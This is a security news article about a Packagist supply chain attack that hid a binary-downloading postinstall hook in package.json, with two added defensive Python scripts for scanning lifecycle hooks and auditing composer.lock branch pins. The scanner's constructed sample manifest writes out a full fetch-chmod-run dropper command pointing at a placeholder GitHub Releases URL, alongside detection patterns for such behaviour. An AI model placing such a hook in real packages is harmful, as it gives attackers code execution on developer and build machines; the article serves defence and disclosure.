Ethical Hacking News
A recent supply chain attack compromised eight packages on Packagist, the default package repository for PHP's Composer dependency manager. The attackers left the Composer metadata in composer.json untouched and instead added a postinstall hook to the package.json file that the affected projects ship alongside it. The hook downloads a Linux binary from a GitHub Releases URL and runs it, giving remote code execution during installation or build workflows. Socket, the application security firm that investigated the incident, found references to the same payload in 777 files on GitHub, suggesting a broader campaign; what the second-stage binary does is unknown because the GitHub account that hosted it is no longer available.
Socket describes the technique as "cross-ecosystem placement", and it is notable for how well it evades security teams scanning PHP dependencies: the malicious code was triggered through lifecycle hooks in package.json rather than anything in composer.json. Composer itself never runs npm scripts, so the hook fires only when a developer or CI job runs npm install inside the checked-out package, typically to build front-end assets. Teams that review only the Composer metadata of their PHP dependencies therefore never see it, while the lifecycle hooks bundled inside the package go unchecked.
Analysis of the affected packages showed that their upstream repositories had been modified to add a postinstall script that downloads a Linux binary from a GitHub Releases URL, saves it as the hidden file /tmp/.sshd (named to resemble the SSH daemon), marks it executable for all users with chmod, and launches it in the background. Because every compromised version is a development branch head rather than a tagged release, the malicious commit reached consumers on their next composer update without any new release being published.
The affected packages and the compromised versions are:
* moritz-sauer-13/silverstripe-cms-theme (dev-master)
* crosiersource/crosierlib-base (dev-master)
* devdojo/wave (dev-main)
* devdojo/genesis (dev-main)
* katanaui/katana (dev-main)
* elitedevsquad/sidecar-laravel (3.x-dev)
* r2luna/brain (dev-main)
* baskarcm/tzi-chat-ui (dev-main)
Socket's investigation found references to the same payload across 777 files on GitHub, suggesting that it could be part of a broader campaign. In at least two instances the payload was added to a GitHub workflow. It is not yet known how many of those hits correspond to distinct compromises rather than forks, duplicate package artifacts or cached references.
What the payload fetched from GitHub actually does is unclear, because the account that hosted the repository is no longer available. The binary's name, gvfsd-network, appears chosen to blend in: it matches a legitimate GNOME Virtual File System (GVfs) daemon that browses network shares, so the process would not stand out in a listing on a desktop or build host.
According to Socket, even without the second-stage binary the installer is enough to warrant blocking. It provides remote code execution during installation or build workflows and tries to stay quiet: it disables TLS certificate verification on the download, suppresses errors so nothing surfaces in the install log, and runs the downloaded binary in the background so the install completes normally.
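The behaviours described in the two paragraphs above map directly onto a triage check. The following script is an added example written for this article, not Socket's tooling and not code from any of the affected packages: it walks a checkout, including vendor/, and flags every npm lifecycle hook whose command fetches from a GitHub Releases URL, disables TLS verification, writes under /tmp, chmods a file executable, silences errors or detaches into the background. The two manifests it scans are constructed, and the placeholder EXAMPLE-ORG/EXAMPLE-REPO URL is not the real payload location.

```python
"""
Triage helper for the cross-ecosystem hook described above: find package.json
lifecycle hooks inside a Composer project (vendor/ included) and flag the
behaviours reported for the dropper. Added example, not Socket's tooling and
not code from any affected package. The sample manifests are constructed.
"""
import json
import re
import tempfile
from pathlib import Path

# npm runs these automatically on `npm install` / `npm ci`; Composer never does.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Indicators drawn from the reported behaviour: GitHub Releases fetch, dropped
# under /tmp, chmod to executable, errors silenced, TLS checks off, detached run.
INDICATORS = [
    ("github-releases-download",
     re.compile(r"github\.com/[^\s'\"]+/releases/download/")),
    ("tls-verification-disabled",
     re.compile(r"\bcurl\b[^|;&]*?\s(?:-[A-Za-z]*k[A-Za-z]*|--insecure)\b"
                r"|\bwget\b[^|;&]*?--no-check-certificate")),
    ("writes-to-tmp", re.compile(r"/tmp/")),
    ("chmod-executable", re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\b")),
    ("errors-suppressed", re.compile(r"2>\s*/dev/null|\|\|\s*true\b")),
    ("background-exec", re.compile(r"&\s*$|\bnohup\b|\bsetsid\b|\bdisown\b")),
]


def inspect_scripts(package_json_text):
    """Map each lifecycle hook present in a package.json to the indicators it trips."""
    try:
        manifest = json.loads(package_json_text)
    except json.JSONDecodeError:
        return {}
    scripts = manifest.get("scripts") if isinstance(manifest, dict) else None
    if not isinstance(scripts, dict):
        return {}
    findings = {}
    for hook in LIFECYCLE_HOOKS:
        command = scripts.get(hook)
        if isinstance(command, str):
            findings[hook] = [label for label, rx in INDICATORS if rx.search(command)]
    return findings


def scan_tree(root):
    """Walk a checkout and return (relative path, hook, indicators) for every hook found."""
    root = Path(root)
    report = []
    for path in sorted(root.rglob("package.json")):
        text = path.read_text(encoding="utf-8", errors="replace")
        for hook, hits in inspect_scripts(text).items():
            report.append((str(path.relative_to(root)), hook, hits))
    return report


# Constructed sample manifests (placeholder org/repo; not the real payload URL).
MALICIOUS_MANIFEST = json.dumps({
    "name": "acme/theme-assets",
    "scripts": {
        "build": "vite build",
        "postinstall": (
            "curl -ks -o /tmp/.sshd "
            "https://github.com/EXAMPLE-ORG/EXAMPLE-REPO/releases/download/v1/gvfsd-network "
            "2>/dev/null; chmod +x /tmp/.sshd; /tmp/.sshd >/dev/null 2>&1 &"
        ),
    },
})
BENIGN_MANIFEST = json.dumps({
    "name": "acme/app",
    "scripts": {"build": "vite build", "postinstall": "node scripts/copy-assets.js"},
})


def demo_report():
    """Lay the constructed samples out like a Composer project and scan them."""
    with tempfile.TemporaryDirectory() as tmp:
        vendor_pkg = Path(tmp, "vendor", "acme", "theme-assets")
        vendor_pkg.mkdir(parents=True)
        vendor_pkg.joinpath("package.json").write_text(MALICIOUS_MANIFEST)
        Path(tmp, "package.json").write_text(BENIGN_MANIFEST)
        return scan_tree(tmp)


if __name__ == "__main__":
    for rel_path, hook, hits in demo_report():
        verdict = "BLOCK" if hits else "ok"
        print(f"{verdict:5} {rel_path}: {hook} -> {', '.join(hits) or '-'}")
```

Point scan_tree at a real project root to use it outside the demo. A hook that trips several indicators at once is the pattern reported here and should be blocked outright; a hook that only calls a local build script is normal and needs no further action.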
The compromise is a reminder that a PHP dependency is more than its Composer metadata: anything a package ships, including an npm manifest, can carry an install-time hook. Developers and security teams should account for this cross-ecosystem placement in their risk assessments and check dependencies for executable lifecycle hooks, not only for known vulnerabilities.
It follows other recent attacks on package repositories and software dependencies, and the common lesson is that install-time and build-time controls matter as much as keeping dependencies patched.
To mitigate these risks, developers and security teams should:
* Scan every package.json in the project and its vendor tree for lifecycle hooks (preinstall, install, postinstall, prepare), not only composer.json, and treat any hook that downloads and executes a binary as malicious regardless of what the second stage turns out to be
* Run npm install with --ignore-scripts (or set ignore-scripts=true in .npmrc) on developer machines and in CI, and invoke the few build steps that genuinely need a hook explicitly
* Pin Composer dependencies to tagged releases, commit composer.lock, and treat dev-master, dev-main and similar branch constraints as a standing risk that needs review whenever the recorded source commit changes
* Monitor upstream repositories for unexpected commits, especially ones that touch package.json, composer.json or CI workflow files
* Check build hosts and developer machines for /tmp/.sshd and for a gvfsd-network process that was not started by GNOME, and block the installer wherever it is found
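Two of the checks above can be automated from files already in the repository. The script below is an added example for this article, not Composer's or npm's own tooling: it lists every package in composer.lock that tracks a branch head (dev-* or *-dev) together with the commit Composer recorded for it, and checks whether the project's .npmrc disables lifecycle scripts. The lock file and .npmrc contents are constructed, with acme/* placeholder package names and a fake commit hash.

```python
"""
Lock-file and npm-config audit for the mitigations above. Added example for this
article, not Composer's or npm's tooling; SAMPLE_LOCK and the .npmrc strings are
constructed with acme/* placeholder names and a fake commit hash.
"""
import json


def dev_branch_pins(lock_text):
    """Return [(name, version, recorded commit)] for packages that track a branch head.

    Composer versions like dev-master, dev-main or 3.x-dev have no immutable
    release behind them: `composer update` takes whatever the upstream branch
    points at, which is how a repository compromise reaches every consumer.
    The lock file still records the exact commit that was installed, so the
    returned reference is what to diff against upstream.
    """
    lock = json.loads(lock_text)
    pins = []
    for section in ("packages", "packages-dev"):
        for pkg in lock.get(section, []):
            version = str(pkg.get("version", ""))
            if version.startswith("dev-") or version.endswith("-dev"):
                reference = (pkg.get("source") or {}).get("reference", "")
                pins.append((pkg.get("name", "?"), version, reference))
    return pins


def npm_scripts_disabled(npmrc_text):
    """True when .npmrc sets ignore-scripts=true; comments (# or ;) are ignored.

    With this setting npm install / npm ci skips every lifecycle hook, including
    a postinstall hidden in a Composer package's package.json. Build steps that
    genuinely need a hook are then run explicitly, e.g. `npm run build`.
    """
    enabled = False
    for raw in npmrc_text.splitlines():
        line = raw.split("#", 1)[0].split(";", 1)[0].strip()
        if "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        if key == "ignore-scripts":
            enabled = value.lower() == "true"   # last assignment wins
    return enabled


FAKE_REF = "0123456789abcdef0123456789abcdef01234567"   # constructed, not a real commit

# Constructed composer.lock excerpt: two branch pins, one tagged release, one dev pin.
SAMPLE_LOCK = json.dumps({
    "packages": [
        {"name": "acme/cms-theme", "version": "dev-master",
         "source": {"type": "git", "url": "https://github.com/acme/cms-theme.git",
                    "reference": FAKE_REF}},
        {"name": "acme/starter-kit", "version": "3.x-dev",
         "source": {"type": "git", "url": "https://github.com/acme/starter-kit.git",
                    "reference": FAKE_REF}},
        {"name": "acme/logger", "version": "2.4.1",
         "source": {"type": "git", "url": "https://github.com/acme/logger.git",
                    "reference": FAKE_REF}},
    ],
    "packages-dev": [
        {"name": "acme/test-tools", "version": "dev-main",
         "source": {"type": "git", "url": "https://github.com/acme/test-tools.git",
                    "reference": FAKE_REF}},
    ],
})

if __name__ == "__main__":
    for name, version, ref in dev_branch_pins(SAMPLE_LOCK):
        print(f"branch pin: {name} {version} @ {ref[:12]}")
    print("npm lifecycle scripts disabled:", npm_scripts_disabled("ignore-scripts=true\n"))
```

Run dev_branch_pins over the real composer.lock in CI and fail the build, or at least require a review, when the list is non-empty or when a recorded reference changes; pair it with ignore-scripts=true so that a hook like the one described here never executes even if a branch pin slips through.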
Taking these steps reduces the risk from supply chain attacks like the one recently discovered on Packagist and limits the damage when one gets through.
Related Information:
https://www.ethicalhackingnews.com/articles/Compromised-Packages-A-Supply-Chain-Attack-on-Packagists-8-Linux-Malware-ehn.shtml
https://thehackernews.com/2026/05/packagist-supply-chain-attack-infects-8.html
Published: Sat May 23 12:52:56 2026 by llama3.2 3B Q4_K_M